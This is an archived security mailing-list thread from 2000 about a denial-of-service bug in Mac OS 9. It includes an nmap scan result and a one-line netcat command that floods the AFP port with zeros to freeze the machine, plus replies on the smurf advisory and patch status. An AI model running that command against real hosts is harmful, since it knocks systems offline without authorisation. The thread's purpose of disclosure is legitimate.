Re: Apple Mac DoS

["Matteo,Marc A." <mmatteo () FUSIONSTORM COM>]

FWIW I just re-installed a Mac OS 9 system from an original iMac OS 9 CD
and then ran Apple's Software Update to get the necessary updates (like
OS 9.0.4).

The Mac OS was updated to 9.0.4 but TCP/IP was NOT automatically updated
to fix the smurf amp (or that high UDP port DoS - I can't remember the
port).

I found that interesting.  I wondow how many Mac users have upgraded
TCP/IP manually?

Marc

> -----Original Message-----
> From: Ian Stoba [mailto:ian () BABCOCKBROWN COM]
> Sent: Thursday, December 14, 2000 9:13 AM
> To: VULN-DEV () SECURITYFOCUS COM
> Subject: Re: [VULN-DEV] Apple Mac DoS
>
>
> Mac OS 9.0 is subject to smurf amplification. Here's a link 
> to the CERT advisory:
>
> http://www.cert.org/advisories/CA-98.01.smurf.html
>
> This is fixed in Mac OS 9.0.4. The update is freely available 
> from Apple:
>
> http://asu.info.apple.com/swupdates.nsf/artnum/n11617
>
> Also, I happened to buy a copy of Mac OS 9 off the shelf in a 
> CompUSA store this week
> and noticed that the version on the install CD was 9.0.4.
>
> The Q wrote:
>
> >   I have noticed some unusual behaviour with Mac OS 9
> >   I am not a Mac user so I apologize if this is a known bug
> >
> >   I have checked the archives and generally on the Net and 
> can find no
> > mention of this effect
> >
> >   any way a bit of background...
> >
> >   I was nmaping a mac (running os 9) to see if I could 
> diagnose why a smb
> > connection couldn't be established. Not being familiar with 
> mac os (at all)
> > I telnetted to the open ports and didn't get a lot.
> >
> >   erm...
> >
> >   then decided to try a netcat to each port.... (don't ask why)
> >
> >   well to cut a long story short it causes a MASSIVE DoS on 
> the mac if you
> > net cat /dev/zero to port 548 tcp. The Machine needs a 
> reset before it will
> > respond. Surely this can't be right?
> >
> >   the details
> >
> >   - Ports open are
> >
> >   testhost@testhost ]$ nmap 192.168.1.96     ## IP of a mac boxen
> >
> >   Starting nmap V. 2.53 by fyodor () insecure org ( 
www.insecure.org/nmap/ )
>   Interesting ports on  (192.168.1.96):
>   (The 1521 ports scanned but not shown below are in state: closed)
>   Port       State       Service
>   427/tcp    open        svrloc
>   548/tcp    open        afpovertcp
>
>   Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds
>
>   to cause the DoS
>
>   testhost@testhost ]$./nc -v 192.168.1.96 548 < /dev/zero
>
>   caused massive DoS - mouse nonfunctional (important on a mac :o)
>
> of course when you stop the netcat the mac returns to normal after
10-20
> secs
________________________________________________________________________
_____________
> Get more from the Web.  FREE MSN Explorer download :
http://explorer.msn.com